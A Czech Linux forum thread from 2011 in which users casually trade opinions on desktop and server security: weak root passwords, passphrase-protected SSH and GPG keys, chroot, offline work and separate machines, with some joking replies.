Pokud uz nekdo hackne Linux, tak vetsinou proto, ze si nejakej uzivatel ulozi root heslo na ftp do totalcommandera, nebo si nastavi root heslo "abc123". Ja bych to nehrotil.

BTW: Doufam, ze ty ssh klice a gpg klice mas chraneni silnou frazi a pouzivas agenty, jinak si zaslouzis, aby ti to uzivatel www-data zobrazil na http serveru:)

Na stanici bych to tak neresil, jednou jsem pouzival Skype v chrootu a stacilo mi to. Pokud zpracovavas citlivy udaje, tak backup a bez site, na nejaky tvoje pecko neni moc nikdo zvedavej. Neco jinyho je server, ale opravdu moc zalezi na tom, co mas za data a pak taky zalezi na tom, jestli mas vysoky ztraty. Jestli se nic moc nedeje, ze se dostanou na verejnost, tak by mela stacit zaloha pro ztrate dat a poskozeni. No a pokud je to blby kdyz se pouze dostanou ven, tak radsi odpojit od inetu a provadet akce offline (podobne jako CA).
Jendа avatar 13.7.2011 17:18 Jendа | skóre: 66 | blog: Výlevníček | JO70FB
Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
BTW: Doufam, ze ty ssh klice a gpg klice mas chraneni silnou frazi a pouzivas agenty, jinak si zaslouzis, aby ti to uzivatel www-data zobrazil na http serveru:)
Naštěstí nemají ostatní právo pro čtení.
13.7.2011 20:32 Hoody
Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
Naneštěstí má Chuck Norris roota
pavlix avatar 14.7.2011 02:15 pavlix | skóre: 47 | blog: pavlix | Praha
Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
Naštěstí nemá root Chucka Norrise.
Nevíme, jakými zbraněmi se bude bojovat ve 3. sv. válce, ale je jisté, že ve 4. sv. to budou klacky a kameny.
13.7.2011 20:35 SPM | skóre: 27
Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
Hlavně tohleto je lepší, když to vůbec neni na disku nebo jinym zařízení s FS...
18.7.2011 09:49 Jan Grmela | skóre: 45 | blog: Kilo šťávy z lachtana | Brno
Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
Nejlepší řešení je separátní počítač. Při dnešní cenách to vyjde nastejno jako se drbat s dokonalým nastavením softwarových omezení. A navíc bezpečnostně je to bezkonkurenční :)

P.S.: Osobně tyhle věci už dávno neřeším. Že by se mi někdo proboxoval z browseru do PC považuju za dost nepravděpodobné pokud člověk denně nestahuje kinderporno a tuny warezeu. Jediné, čeho se bojím, je Fleš -- na ten mám ale ve všech prohlížečích click-to-flash tudíž i zde je riziko minimální. A ani ne tak kvůli bezpečnosti jako spíše příšerné žravosti Fleše a tomu, že reklamy v něm realizované jsou obvykle extra otravné.
Píšu pro Pivní recenze a protože mě to IT už fakt nebaví, tak jsme si s klukama postavili pivovar Lucky Bastard

Založit nové vláknoNahoru

ISSN 1214-1267   Powered by Hosting 90 Server hosting
© 1999-2013 Argonit s. r. o. Všechna práva vyhrazena.